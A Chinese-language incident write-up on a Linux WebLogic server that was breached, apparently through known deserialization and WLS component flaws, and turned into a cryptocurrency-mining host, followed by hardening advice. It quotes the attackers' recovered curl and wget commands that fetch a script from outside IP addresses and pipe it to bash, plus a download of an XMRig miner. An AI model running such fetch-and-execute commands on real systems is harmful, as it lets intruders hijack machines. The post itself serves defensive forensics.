记录一次Linux系统Weblogic入侵到挖矿事件

背景

 某台运行有weblogic的服务器短时间内CPU使用率飙升到80%以上,严重影响正常业务程序使用。

记录一次Linux系统Weblogic入侵到挖矿事件_第1张图片

初步结论

结合流量中的上百次的挖矿行为与主机端扫描出的恶意文件,初步判断是通过Weblogic服务进行挖矿的一次恶意事件。黑客可能通过利用 WebLogic 反序列化漏洞(CVE-2017-3248 )和 WebLogic WLS 组件漏洞(CVE-2017-1027 1)对企业使用WebLogic WLS组件的业务进行入侵并植入

 

过程取证

通过查阅Linux的相关日志,发现有恶意用户通过执行curl命令与wget从远程服务器获取到脚本并使用bash命令成功执行。并且下载了名为xmrig-y的门罗币最块CPU挖矿软件

curl 45.123.190.178/lin.txt| bash
wget -q0 -http://45.123.190.178/lin |bash
curl 45.123.190.178/lin.txt| bash
downloader http://165.227.215.25/xmrig-y

详细的脚本内容参考如下

记录一次Linux系统Weblogic入侵到挖矿事件_第2张图片

该脚本首先会杀掉本机上的python和java程序,然后下载运行比特币的挖矿程序xmrig-y(xmrig-y.exe,该程序被多款杀毒软件标示为挖矿或恶意木马程序),然后伪装成java文件运行

经过检查Weblogic的版本为 版本,且存在wls-wsat.war的war包

记录一次Linux系统Weblogic入侵到挖矿事件_第3张图片

VT查杀进一步确认恶意文件样本

记录一次Linux系统Weblogic入侵到挖矿事件_第4张图片

加固建议

1.删除wls-wsat应用包

WebLogic11g版本,wls-wsat应用包的位置:$WL_HOME/server/lib/wls-wsat.war

2.删除每个WebLogic Server目录下的tmp目录

有JSP网页木马已经潜伏在

$DOMAIN_HOME/servers/SERVER_NAME/tmp/_WL_internal/bea_wls_internal/目录下管理、被管Server均需执行。

位置:$DOMAIN_HOME/servers/SERVER_NAME/tmp

3.更新补丁和扫描:

更新Oracle官方发布相关补丁,下载链接:

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

你可能感兴趣的:(记录一次Linux系统Weblogic入侵到挖矿事件)